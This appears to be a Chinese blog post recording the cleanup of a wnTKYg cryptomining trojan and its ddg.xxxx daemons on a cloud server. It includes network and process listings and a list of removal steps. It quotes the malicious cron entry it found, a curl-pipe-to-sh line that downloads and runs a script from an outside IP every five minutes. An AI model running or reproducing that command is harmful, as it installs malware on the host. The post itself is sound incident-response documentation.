记录清除wnTKYg挖矿工木马(守护进程ddg.xxxx)的过程
起因,阿里云多次提醒我的一台服务器有恶意发包行为,且给出了一些解决办法。之前也没太在意,就按照解决办法处理了一下。然后过一段时间,还是提示有此行为。
猜肯定是中了木马了,开始以为是被肉鸡了拿来做DDoS攻击别人了。今天去服务器上仔细看了一下。然后发现了问题究竟(目前猜应该如此,还等待观察)。
现将过程记录如下:
1、先查看一下端口情况,发现有些名为ddg.xxxx的进程很可疑。然后看了下远程的链接IP,美国、法国等地方,很奇怪。网上搜了一下,没什么结果。
[root@zhangtianguo ~]# netstat -anp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22111 0.0.0.0:* LISTEN 840/sshd tcp 0 0 127.0.0.1:32000 0.0.0.0:* LISTEN 27121/java tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN 20918/memcached tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 813/nginx: worker p tcp 0 0 0.0.0.0:81 0.0.0.0:* LISTEN 1497/httpd tcp 0 0 0.0.0.0:82 0.0.0.0:* LISTEN 1497/httpd tcp 0 0 0.0.0.0:83 0.0.0.0:* LISTEN 1497/httpd tcp 0 0 0.0.0.0:85 0.0.0.0:* LISTEN 1497/httpd tcp 401 0 我的IP:42388 106.11.68.13:80 CLOSE_WAIT 11393/AliYunDunUpda tcp 0 1 我的IP:43968 52.2.199.2:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:38258 54.222.159.38:8443 SYN_SENT 1620/ddg.1010 tcp 401 0 我的IP:41811 106.11.68.13:80 CLOSE_WAIT 11393/AliYunDunUpda tcp 401 0 我的IP:53489 140.205.140.205:80 CLOSE_WAIT 11393/AliYunDunUpda tcp 0 0 我的IP:59795 202.181.169.98:8443 ESTABLISHED 25125/ddg.2011 tcp 0 0 我的IP:50071 212.83.189.246:443 ESTABLISHED 12908/wnTKYg tcp 0 1 我的IP:47592 106.75.74.11:9443 SYN_SENT 12799/ddg.1009 tcp 371 0 10.174.208.36:51087 100.100.25.3:80 CLOSE_WAIT 11393/AliYunDunUpda tcp 0 0 我的IP:40019 106.11.68.13:80 ESTABLISHED 11448/AliYunDun tcp 0 0 127.0.0.1:32000 127.0.0.1:31001 ESTABLISHED 27119/wrapper tcp 0 1 我的IP:39511 39.108.56.56:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:50528 121.69.45.254:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:51132 106.75.71.242:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:60425 120.77.46.195:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:54458 116.39.7.114:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:57546 54.183.178.110:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:57686 106.75.134.239:8443 SYN_SENT 1620/ddg.1010 tcp 0 1 我的IP:56848 61.65.191.22:8443 SYN_SENT 1620/ddg.1010 tcp 401 0 我的IP:52910 106.11.68.13:80 CLOSE_WAIT 11393/AliYunDunUpda tcp 0 604 我的IP:22111 27.10.185.19:63158 ESTABLISHED 19368/sshd: root@pt tcp 0 1 我的IP:56357 165.225.157.157:8443 SYN_SENT 1620/ddg.1010
2、然后,看了下这个进程的具体情况,居然是在/tmp/下的进程,心中更多抑或:
[root@zhangtianguo ~]# ps aux | grep ddg root 1620 0.1 0.7 209684 13688 ? Sl Jul12 78:05 /tmp/ddg.1010 root 12799 0.0 0.2 262816 5460 ? Sl Jul01 9:32 /tmp/ddg.1009 root 19576 0.0 0.0 112644 960 pts/1 S+ 10:01 0:00 grep --color=auto ddg root 25125 0.0 0.2 207236 5172 ? Sl Aug27 2:13 /tmp/ddg.2011 root 28248 0.0 0.2 207192 4520 ? Sl Jul27 38:09 /tmp/ddg.1021
3、再去看看/tmp/下的文件,只有一个ddg.2011的文件,当时就心想,肯定是这些进程运行后,又自动删除了文件,看时间,8月创建的时间的文件,全部统统rm掉:
[root@zhangtianguo tmp]# ll -ah total 9.6M drwxrwxrwt. 9 root root 4.0K Aug 29 10:02 . drwxr-xr-x. 20 root root 4.0K Jun 30 18:04 .. srwxr-xr-x 1 root root 0 Aug 28 12:53 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> -rwxr-xr-x 1 root root 9.5M Aug 11 10:13 ddg.2011 drwxrwxrwt. 2 root root 4.0K Nov 21 2014 .font-unix drwxr-xr-x 2 root root 4.0K Aug 17 10:07 hsperfdata_root drwxrwxrwt. 2 root root 4.0K Nov 21 2014 .ICE-unix drwx------ 3 root root 4.0K Nov 26 2015 systemd-private-nwO9vi drwxrwxrwt. 2 root root 4.0K Nov 21 2014 .Test-unix drwxrwxrwt. 2 root root 4.0K Nov 21 2014 .X11-unix drwxrwxrwt. 2 root root 4.0K Nov 21 2014 .XIM-unix
4、再重复步骤1,查看端口情况,又发现了这个玩意儿,感觉不太正常(直觉):
tcp 0 0 我的IP:50071 212.83.189.246:443 ESTABLISHED 12908/wnTKYg
5、一搜,原来居然是个挖矿的程序貌似。原来已经有不少人中招过了。解决办法也有很多人给出了,基本上就是:
先给redis的问题处理掉,改端口、加密码之类;
查看/root/.ssh/下的文件,是否有异常登陆信息,有的话删掉;
搜索wnTKYg的相关文件( find / -name *wnTKYg*),删掉;
删掉/tmp/下的异常文件(主要是ddg.xxxx之类的);
kill掉wnTKYg以及ddg.xxxx的进程;
还有个问题,这个程序有个自动任务,从木马服务器下载程序执行,也要删掉:
cd /var/spool/cron ll -ah rm -rf *
我查看这个目录时,发现里面的自动任务是这样的,好像是印度一个IP:
[root@zhangtianguo cron]# cat root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
至此,完工。然后继续观察。
参考资料。感谢:
http://blog.csdn.net/u010789532/article/details/70528648
http://blog.csdn.net/zimou5581/article/details/73064878